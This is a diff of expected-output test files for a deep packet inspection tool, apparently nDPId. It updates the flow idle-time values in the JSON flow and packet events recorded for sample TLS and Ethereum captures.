FdJ5mNaCsSn9Hj6115hdy9xFKhCCzMA44L9pVw\/vrGvG+5UfibZ5LK2nZAPALOtdzhzm7d0W1ff7a4XSuSSFRI3gCI5CHoPx4osmf747Wa4ElvuEUhPCcdTFrF6efl9qMHJEUwf8zrcwZxBFmZHEDMTcH8MlFUx5dN14A3E5eAVFahmuI+6IR1wd8HaXtmYAHAACQAE="} -00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680387847,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGkJDAqAEMaBB9r8LfAbu98X4VZuCG7lAYIACqfgAAFgMBAscBAALDAwPZvt6xqK7JiSO2eRBioUk2Uu867QdPWpn6Sv4hYS472iAz8c+AKNafKEsBeorsjdYMXk2HdHvKJL23Af8gga\/qxAAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg0HCVKAanlLS9J1B8hdchDfkoKDxcPc3B5hBZYsZWdz8AFwBBBCakAur\/e3rF+tGl0au7NOTY4DQpBg\/YjV6ew74w8otvaCGiCdoeWGhEGjsldqwZrBxN3o59i8BSdRX+YPQ+GgkAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAFyK2kXV21yqtAW2T62b\/NDTnJgxOrhECle3qcjynhZQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJLkAAE456EuY9a6HsKAg7En+2G8rSItqsoven5V2IfJ3Q2bekOZcTKgIZokRYkaF7ExtxsFhqXy+gigbwIQnaXqjvmpA5fAKz4tj4ykxew5OhWQtUKuHkOYZfaYtn1syOdzFlDd5f+dopSDJ1HH+q6E3XfYeSjmwk2PLEJ57JKeThEiW3dFrbufb5XbXZxYdeC179v7EU6Bakj2Njpvv\/Jfo5WxPGqtw\/pm8l4GeHZCKXzswlPS\/Jet6JKlP28PhB6QjuLs0HyKQD3u9h3gOMLbs85P+uPv\/61THn6BnP+Gq0XsiHUv\/ZFCqDNSvUTBmtmCAtgIUfzrLcUWkNsVonaILrLi\/m6vYUQElVuyPe7nXS\/qvJdz0NipXdWB8POXCwp8YOWkAHAACQAE="} -00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01420{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680391590,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGxnTAqAEMaBZHxcLpAbsLJg40SW6gUlAYIAANXgAAFgMBAscBAALDAwMJLl9l\/OldUJYbpqd0xOpts3Kv4zg2hroTXcdX9KeB2CBjkfBVUTqX532YPuVZHQd0J5lIK2OZH9nsSRBnWwKDWwAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAgsbxhJX9IcnjB7rdgEb2YIBohnnxEhKIToNk1er8CIioAFwBBBLtlLNXLCuP0okhISXwuyj6tgeyLGZ5yaSZ9uT3zAbum2y5l1gYjS6RGBBL9dNcuY2pA4Ze582sOuuo0cAvw2TsAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACCgcq\/jSZGFwhXJHl9nfU84W9RHblecX+XHXi+knd++egAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJM1prHJ\/+qDqcKEqpG5xU365kjS5loGMkTxyoKwRhL+l3TthfgE+TKCSsunPt4vNjTPLrxKpdN+3jkm4v5pXmXQY7xTIeDCWHjyEgNKkvyfWHZEc70MAkkqfNhBXSLrthF\/1heQEBlRbs1xtqteJZDPsTf1rb0lyjahdcH23rHhPVaZljcat4wh7Hka7vt+kTz6HVLMaa8+FGdKR02KYBfqCbkN5nqbjMCHPCoPKBXF7APN9aYQZNPW1vyVMZGeIilksOKMAfbO31cu423QrZX+PlzwFC6qBeqVxOTzYpLwLIxJGCnfdBRD0u85D1TvPM05OjHVwJVu9F3FEA\/S2klQ0zWf5b6ngXXAHdoEO61eGscgYik1z+CCLYUuTKEqAk5KVlL4AHAACQAE="} -00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01422{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1590680386576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680386576,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGjOfAqAEMaBuBTcLeAbt3Q5LX\/48DFVAYIACwHgAAFgMBAscBAALDAwOTwM86TEdZaYZx77QiKeLaOUyI6FPS+J3L+0S3MA31OCDtrXy2AkmiC5EC8aXH8NKs5TG5ofTGvlsmIWUcTFlOhgAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg9C+VXLX0pUAYcvwRMlm2BfjMFL+A2Ha+teHeYm8XszAAFwBBBKhP+5j\/iIqKULsVEv1xkLdgIoxwczB5EVKfTq\/0aLaIOqqUx255GoGIKzaHGdYeWvgG2FTscntynOjMKiH+1xMAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAoJey8d6KdccaSJO2lCYt20kw0EEYFyldVNE\/b+wVlLQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJJYkyzxOIwgn94z1v2QNIt6jP8xZjqajLZOZBVhvvpl7nmhmH4lW1IkwcuGd4kzR+4ip9x\/EzAG6tckU\/flqZH1nG16JhZuu6rEiIYaISW303wwyjD1flAsQnOsqJ0PVy+NZQoiiKbjH4viDA+P+GiaonlAB8r2TaJD+948G4F7MBjpovbjBjfrBFM8f7NuL4fwv7ssjFdJ5mNaCsSn9Hj6115hdy9xFKhCCzMA44L9pVw\/vrGvG+5UfibZ5LK2nZAPALOtdzhzm7d0W1ff7a4XSuSSFRI3gCI5CHoPx4osmf747Wa4ElvuEUhPCcdTFrF6efl9qMHJEUwf8zrcwZxBFmZHEDMTcH8MlFUx5dN14A3E5eAVFahmuI+6IR1wd8HaXtmYAHAACQAE="} +00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1590680387847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680387847,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGkJDAqAEMaBB9r8LfAbu98X4VZuCG7lAYIACqfgAAFgMBAscBAALDAwPZvt6xqK7JiSO2eRBioUk2Uu867QdPWpn6Sv4hYS472iAz8c+AKNafKEsBeorsjdYMXk2HdHvKJL23Af8gga\/qxAAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg0HCVKAanlLS9J1B8hdchDfkoKDxcPc3B5hBZYsZWdz8AFwBBBCakAur\/e3rF+tGl0au7NOTY4DQpBg\/YjV6ew74w8otvaCGiCdoeWGhEGjsldqwZrBxN3o59i8BSdRX+YPQ+GgkAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAFyK2kXV21yqtAW2T62b\/NDTnJgxOrhECle3qcjynhZQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJLkAAE456EuY9a6HsKAg7En+2G8rSItqsoven5V2IfJ3Q2bekOZcTKgIZokRYkaF7ExtxsFhqXy+gigbwIQnaXqjvmpA5fAKz4tj4ykxew5OhWQtUKuHkOYZfaYtn1syOdzFlDd5f+dopSDJ1HH+q6E3XfYeSjmwk2PLEJ57JKeThEiW3dFrbufb5XbXZxYdeC179v7EU6Bakj2Njpvv\/Jfo5WxPGqtw\/pm8l4GeHZCKXzswlPS\/Jet6JKlP28PhB6QjuLs0HyKQD3u9h3gOMLbs85P+uPv\/61THn6BnP+Gq0XsiHUv\/ZFCqDNSvUTBmtmCAtgIUfzrLcUWkNsVonaILrLi\/m6vYUQElVuyPe7nXS\/qvJdz0NipXdWB8POXCwp8YOWkAHAACQAE="} +00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01420{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1590680391590,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680391590,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGxnTAqAEMaBZHxcLpAbsLJg40SW6gUlAYIAANXgAAFgMBAscBAALDAwMJLl9l\/OldUJYbpqd0xOpts3Kv4zg2hroTXcdX9KeB2CBjkfBVUTqX532YPuVZHQd0J5lIK2OZH9nsSRBnWwKDWwAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAgsbxhJX9IcnjB7rdgEb2YIBohnnxEhKIToNk1er8CIioAFwBBBLtlLNXLCuP0okhISXwuyj6tgeyLGZ5yaSZ9uT3zAbum2y5l1gYjS6RGBBL9dNcuY2pA4Ze582sOuuo0cAvw2TsAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACCgcq\/jSZGFwhXJHl9nfU84W9RHblecX+XHXi+knd++egAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJM1prHJ\/+qDqcKEqpG5xU365kjS5loGMkTxyoKwRhL+l3TthfgE+TKCSsunPt4vNjTPLrxKpdN+3jkm4v5pXmXQY7xTIeDCWHjyEgNKkvyfWHZEc70MAkkqfNhBXSLrthF\/1heQEBlRbs1xtqteJZDPsTf1rb0lyjahdcH23rHhPVaZljcat4wh7Hka7vt+kTz6HVLMaa8+FGdKR02KYBfqCbkN5nqbjMCHPCoPKBXF7APN9aYQZNPW1vyVMZGeIilksOKMAfbO31cu423QrZX+PlzwFC6qBeqVxOTzYpLwLIxJGCnfdBRD0u85D1TvPM05OjHVwJVu9F3FEA\/S2klQ0zWf5b6ngXXAHdoEO61eGscgYik1z+CCLYUuTKEqAk5KVlL4AHAACQAE="} +00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","packets-captured":3,"packets-processed":3,"total-skipped-flows":0,"total-l4-data-len":2148,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1590680391590} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 3/3 diff --git a/test/results/ethereum.pcap.out b/test/results/ethereum.pcap.out index c0f0a019d..1d40f026e 100644 --- a/test/results/ethereum.pcap.out +++ b/test/results/ethereum.pcap.out @@ -28,219 +28,219 @@ 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1578508364422,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508364422,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHAOAAAEAR3JLAqAG4NOelbHZfdl8As+U915lp9gBLtC6IaCW33is1Th50j8UHjOmT4mAffcZn+yYEl4jGBnLnkKaeXePCjndUh79\/WTQA2R4kNex3KmtFmldicE1yJNj24ZecPC4hxpTcI9qIeMXPlU0BU5Rec0LcAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBg"} 01863{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1578508364519,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1097,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1097,"pkt_l4_len":1063,"thread_ts_msec":1578508364519,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ7F1RAAC8RPN4D0S1PwKgBuHZfdl8EJ4PVaVYTvO9LrTk6yni9j9O4lLCx8c3w2iOwFQRksfASVhzN6T8K7lnXRwHY7v3+ONhElGFbYOffjDytd02o206R62nDNZ+LcEa5V5K9KHZQh029ihE8Ury3mI0LZjHE13ZDAAT5A7r5A7L4S4QjtPapgnZdgLhAO5qC1ATimkffsyZlSJIXGVIuxdFsM86E7cqAjFOnv\/8DXNCQHJBVJiDXoCE+xGUbCBkPCreAagxpFk0Kv5X\/6PhNhKUWayGCdl+Cdl+4QFK2HHRAlM9Mj+TxGD7ACVRZHZtB58hxcD+hW2XdmacQwMOkGeflfz3iQaCGa6bw7UpxurZYH9DtQSW8Gn+wiV74TYRZJmMignZfgnZfuEBNXexB6IZur6GByNXF5kqBGoYoINyuPaRzRT\/L\/XeZwo80a\/N6vMBtsgrq2ZF9h4G0sqa47Wg7uKDWSZtY6p\/o+E2EsoDD3IJ2X4J2X7hAE9D206tRuSrRWszd5+5PqyxrzPQHPgJ6M4jR3YAwA4SXyWoQd9UmDUgHBtsrr3UYDBX+DpI9ijrH8jmNKWfim\/hNhKLzoFOCdl+Cdl+4QFcgAb+wxvXRoA\/jZ6pZpvtWMqWRnDTAVCrWET9xUm+STSO+d5OO9wGG7pHu9I5ueUw\/fAd5lu3NtaUH9uwTgQX4TYQSilEcgnZfgnZfuEDrOA+HQ7eWMjwlUeqXlrKvkuj1DTxVelkYAtV5dglpnIhrBZIeo034r7N3OARecEoNp0x6OeeY\/TD1OnJUir9u+E2EMyY8T4J2X4J2X7hAjvDxlr5M7BUzw40ony1SnzUKukEALVTn0B8WrIdd1Y\/HWL6mkTC4nsoMDegX1FF++rFMqjeViKJkeSDvzXh7sPhNhChDkICCdl+Cdl+4QHLmnbcNhaAJxQnuC0km5NBqC0yHT\/O8y7iwbqWb3zIi\/JNBIGOytm1SPyhBCVXEAh08vp59waAp0Fl3XZsLDpX4TYTH56bignZggnZguEAmai5v1neViV7teAsEvO\/IJYfemYLf2+j3ix3twO4cHaO8DDPa+4MSEcEzAFsUx\/2pmlUPII1TqUXgDk2+EYuF+E2EMyZRtIJ2X4J2X7hAgHT+RrAG20B8DB\/bHPvQKm79m+Z0+BB1fJpuHmieLdFavNthxznxmL2TjLC2hF17uhr9nJ8lRGk+kyETydUasfhNhFKR3PmCdl+Cdl+4QN